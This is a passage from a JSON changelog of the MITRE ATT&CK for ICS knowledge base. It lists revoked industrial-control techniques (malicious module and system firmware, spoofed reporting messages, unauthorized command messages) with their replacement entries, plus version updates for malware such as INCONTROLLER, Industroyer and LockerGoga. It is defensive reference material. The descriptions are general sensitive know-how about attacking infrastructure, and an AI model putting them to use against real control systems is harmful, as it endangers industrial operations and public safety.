                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "ics-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-21 17:43:26.506000+00:00",
                    "modified": "2026-04-20 20:58:46.789000+00:00",
                    "name": "Module Firmware",
                    "description": "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment.   \n\nThis technique is similar to [System Firmware](https://attack.mitre.org/techniques/T0857), but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. (Citation: Daniel Peck,  Dale Peterson January 2009)  \n\nAn easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following: (Citation: Daniel Peck,  Dale Peterson January 2009)  \n\n* Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time.  \n* Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return.  \n* Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator.   \n* A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise.  \n* Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "impair-process-control"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0839",
                            "external_id": "T0839"
                        },
                        {
                            "source_name": "Daniel Peck,  Dale Peterson January 2009",
                            "description": "Daniel Peck,  Dale Peterson 2009, January 28 Leveraging Ethernet Card Vulnerabilities in Field Devices Retrieved. 2017/12/19 ",
                            "url": "https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 20:58:46.789000+00:00\", \"old_value\": \"2025-04-16 21:26:20.310000+00:00\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--75587e49-ab7e-44df-9549-faeb1da57f39",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-20 20:54:18.535000+00:00",
                        "modified": "2026-04-23 19:15:57.683000+00:00",
                        "name": "Module Firmware",
                        "description": "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment.\n\nThis technique is similar to System Firmware, but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices.(Citation: Daniel Peck,  Dale Peterson January 2009)\n\nAn easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following:(Citation: Daniel Peck,  Dale Peterson January 2009)\n\n* Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time.\n* Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return.\n* Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator.\n* A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise.\n* Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "persistence"
                            },
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "inhibit-response-function"
                            },
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "impair-process-control"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1693/002",
                                "external_id": "T1693.002"
                            },
                            {
                                "source_name": "Daniel Peck,  Dale Peterson January 2009",
                                "description": "Daniel Peck,  Dale Peterson 2009, January 28 Leveraging Ethernet Card Vulnerabilities in Field Devices Retrieved. 2017/12/19 ",
                                "url": "https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "ics-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-21 17:43:26.506000+00:00",
                    "modified": "2026-04-20 20:58:43.011000+00:00",
                    "name": "Spoof Reporting Message",
                    "description": "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values. \n\nIf an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "evasion"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "impair-process-control"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0856",
                            "external_id": "T0856"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 20:58:43.011000+00:00\", \"old_value\": \"2025-04-16 21:26:15.909000+00:00\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--527106b3-95a2-4ed2-bf89-db7f0e4d0da0",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-20 20:54:17.539000+00:00",
                        "modified": "2026-04-23 19:01:42.644000+00:00",
                        "name": "Reporting Message",
                        "description": "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values.\n\nIf an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "evasion"
                            },
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "impair-process-control"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1692/002",
                                "external_id": "T1692.002"
                            },
                            {
                                "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                                "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                                "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "ics-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-21 17:43:26.506000+00:00",
                    "modified": "2026-04-20 20:58:44.575000+00:00",
                    "name": "System Firmware",
                    "description": "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. \n\nAn adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers. (Citation: Basnight, Zachry, et al.)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0857",
                            "external_id": "T0857"
                        },
                        {
                            "source_name": "Basnight, Zachry, et al.",
                            "description": "Basnight, Zachry, et al. 2013 Retrieved. 2017/10/17 ",
                            "url": "http://www.sciencedirect.com/science/article/pii/S1874548213000231"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 20:58:44.575000+00:00\", \"old_value\": \"2025-04-16 21:26:17.862000+00:00\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--68a9324d-a524-4766-a899-a026f68a33df",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-20 20:54:18.031000+00:00",
                        "modified": "2026-04-23 19:10:31.871000+00:00",
                        "name": "System Firmware",
                        "description": "System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprograming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network.\n\nAn adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers.(Citation: Basnight, Zachry, et al.)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "persistence"
                            },
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "inhibit-response-function"
                            },
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "impair-process-control"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1693/001",
                                "external_id": "T1693.001"
                            },
                            {
                                "source_name": "Basnight, Zachry, et al.",
                                "description": "Basnight, Zachry, et al. 2013 Retrieved. 2017/10/17 ",
                                "url": "http://www.sciencedirect.com/science/article/pii/S1874548213000231"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "ics-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-21 17:43:26.506000+00:00",
                    "modified": "2026-04-20 20:58:41.104000+00:00",
                    "name": "Unauthorized Command Message",
                    "description": "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nIn the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "impair-process-control"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T0855",
                            "external_id": "T0855"
                        },
                        {
                            "source_name": "Benjamin Freed March 2019",
                            "description": "Benjamin Freed 2019, March 13 Tornado sirens in Dallas suburbs deactivated after being hacked and set off Retrieved. 2020/11/06 ",
                            "url": "https://statescoop.com/tornado-sirens-in-dallas-suburbs-deactivated-after-being-hacked-and-set-off/"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        },
                        {
                            "source_name": "Zack Whittaker April 2017",
                            "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ",
                            "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 20:58:41.104000+00:00\", \"old_value\": \"2025-04-16 21:26:13.939000+00:00\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--4344d1b8-968b-4697-9ab9-f9abe5f52265",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-20 20:54:17.053000+00:00",
                        "modified": "2026-04-23 18:59:19.225000+00:00",
                        "name": "Command Message",
                        "description": "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105).(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nIn the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster.(Citation: Zack Whittaker April 2017)(Citation: Benjamin Freed March 2019)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "evasion"
                            },
                            {
                                "kill_chain_name": "mitre-ics-attack",
                                "phase_name": "impair-process-control"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1692/001",
                                "external_id": "T1692.001"
                            },
                            {
                                "source_name": "Benjamin Freed March 2019",
                                "description": "Benjamin Freed 2019, March 13 Tornado sirens in Dallas suburbs deactivated after being hacked and set off Retrieved. 2020/11/06 ",
                                "url": "https://statescoop.com/tornado-sirens-in-dallas-suburbs-deactivated-after-being-hacked-and-set-off/"
                            },
                            {
                                "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                                "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                                "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                            },
                            {
                                "source_name": "Zack Whittaker April 2017",
                                "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ",
                                "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "ics-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_version": "1.0"
                    }
                }
            ],
            "deprecations": [],
            "deletions": []
        },
        "software": {
            "additions": [],
            "major_version_changes": [],
            "minor_version_changes": [
                {
                    "type": "malware",
                    "id": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-09-28 20:07:40.272000+00:00",
                    "modified": "2026-04-23 14:06:34.251000+00:00",
                    "name": "INCONTROLLER",
                    "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) is custom malware that includes multiple modules tailored towards ICS devices and technologies, including Schneider Electric and Omron PLCs as well as OPC UA, Modbus, and CODESYS protocols. [INCONTROLLER](https://attack.mitre.org/software/S1045) has the ability to discover specific devices, download logic on the devices, and exploit platform-specific vulnerabilities. As of September 2022, some security researchers assessed [INCONTROLLER](https://attack.mitre.org/software/S1045) was developed by CHERNOVITE.(Citation: CISA-AA22-103A)(Citation: Brubaker-Incontroller)(Citation: Dragos-Pipedream)(Citation: Schneider-Incontroller)(Citation: Wylie-22) ",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S1045",
                            "external_id": "S1045"
                        },
                        {
                            "source_name": "PIPEDREAM",
                            "description": "(Citation: Dragos-Pipedream)(Citation: Wylie-22)"
                        },
                        {
                            "source_name": "CISA-AA22-103A",
                            "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.",
                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a"
                        },
                        {
                            "source_name": "Dragos-Pipedream",
                            "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite\u2019s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.",
                            "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en"
                        },
                        {
                            "source_name": "Wylie-22",
                            "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.",
                            "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf"
                        },
                        {
                            "source_name": "Brubaker-Incontroller",
                            "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. Retrieved September 28, 2022.",
                            "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool"
                        },
                        {
                            "source_name": "Schneider-Incontroller",
                            "description": "Schneider Electric. (2022, April 14). Schneider Electric Security Bulletin: \u201cAPT Cyber Tools Targeting ICS/SCADA Devices\u201d . Retrieved September 28, 2022.",
                            "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SESB-2022-01"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "INCONTROLLER",
                        "PIPEDREAM"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jimmy Wylie, Dragos, Inc."
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Engineering Workstation",
                        "Field Controller/RTU/PLC/IED",
                        "Safety Instrumented System/Protection Relay",
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 14:06:34.251000+00:00\", \"old_value\": \"2025-04-16 21:26:25.242000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "malware",
                    "id": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-01-04 20:42:21.997000+00:00",
                    "modified": "2026-04-23 14:11:53.057000+00:00",
                    "name": "Industroyer",
                    "description": "[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0604",
                            "external_id": "S0604"
                        },
                        {
                            "source_name": "CRASHOVERRIDE",
                            "description": "(Citation: Dragos Crashoverride 2017)"
                        },
                        {
                            "source_name": "Win32/Industroyer",
                            "description": "(Citation: ESET Industroyer)"
                        },
                        {
                            "source_name": "ESET Industroyer",
                            "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.",
                            "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf"
                        },
                        {
                            "source_name": "Dragos Crashoverride 2017",
                            "description": "Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.",
                            "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
                        },
                        {
                            "source_name": "Dragos Crashoverride 2018",
                            "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.",
                            "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Industroyer",
                        "CRASHOVERRIDE",
                        "Win32/Industroyer"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dragos Threat Intelligence",
                        "Joe Slowik - Dragos"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 14:11:53.057000+00:00\", \"old_value\": \"2024-04-11 16:06:34.700000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 1.2"
                },
                {
                    "type": "malware",
                    "id": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-04-16 19:00:49.435000+00:00",
                    "modified": "2026-04-22 22:21:12.036000+00:00",
                    "name": "LockerGoga",
                    "description": "[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0372",
                            "external_id": "S0372"
                        },
                        {
                            "source_name": "CarbonBlack LockerGoga 2019",
                            "description": "CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification \u2013 LockerGoga Ransomware. Retrieved April 16, 2019.",
                            "url": "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/"
                        },
                        {
                            "source_name": "Unit42 LockerGoga 2019",
                            "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.",
                            "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "LockerGoga"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
